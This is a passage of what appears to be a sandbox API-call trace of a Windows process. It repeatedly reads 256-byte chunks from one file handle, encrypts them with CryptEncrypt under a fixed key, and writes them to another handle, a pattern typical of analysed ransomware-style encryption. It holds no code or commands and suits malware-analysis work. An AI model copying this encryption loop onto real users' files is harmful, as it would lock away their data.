hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.787] GetLastError () returned 0x0 [0144.787] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.787] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.787] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.787] GetLastError () returned 0x0 [0144.787] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.787] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.787] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.788] GetLastError () returned 0x0 [0144.788] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.788] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.788] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.788] GetLastError () returned 0x0 [0144.788] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.788] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.788] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.788] GetLastError () returned 0x0 [0144.788] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.788] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.788] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.788] GetLastError () returned 0x0 [0144.788] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.788] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.788] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.788] GetLastError () returned 0x0 [0144.788] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.788] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.788] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.788] GetLastError () returned 0x0 [0144.788] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.788] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.788] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.788] GetLastError () returned 0x0 [0144.788] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.789] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.789] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.789] GetLastError () returned 0x0 [0144.789] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.789] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.789] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.789] GetLastError () returned 0x0 [0144.789] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.789] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.789] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.789] GetLastError () returned 0x0 [0144.789] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.789] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.789] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.789] GetLastError () returned 0x0 [0144.789] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.789] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.789] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.789] GetLastError () returned 0x0 [0144.789] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.789] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.789] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.789] GetLastError () returned 0x0 [0144.789] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.790] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.790] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.790] GetLastError () returned 0x0 [0144.790] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.790] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.790] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.790] GetLastError () returned 0x0 [0144.790] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.790] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.790] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.790] GetLastError () returned 0x0 [0144.790] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.790] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.790] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.790] GetLastError () returned 0x0 [0144.790] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.790] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.790] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.790] GetLastError () returned 0x0 [0144.790] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.790] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.790] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.790] GetLastError () returned 0x0 [0144.790] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.790] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.790] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.791] GetLastError () returned 0x0 [0144.791] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.791] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.791] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.791] GetLastError () returned 0x0 [0144.791] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.791] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.791] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.791] GetLastError () returned 0x0 [0144.791] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.791] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.791] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.791] GetLastError () returned 0x0 [0144.791] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.791] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.791] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.791] GetLastError () returned 0x0 [0144.791] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.791] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.791] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.791] GetLastError () returned 0x0 [0144.791] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.791] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.791] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.791] GetLastError () returned 0x0 [0144.791] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.792] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.792] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.792] GetLastError () returned 0x0 [0144.792] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.792] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.792] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.792] GetLastError () returned 0x0 [0144.792] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.792] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.792] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.792] GetLastError () returned 0x0 [0144.792] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.792] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.792] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.792] GetLastError () returned 0x0 [0144.792] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.792] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.792] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) 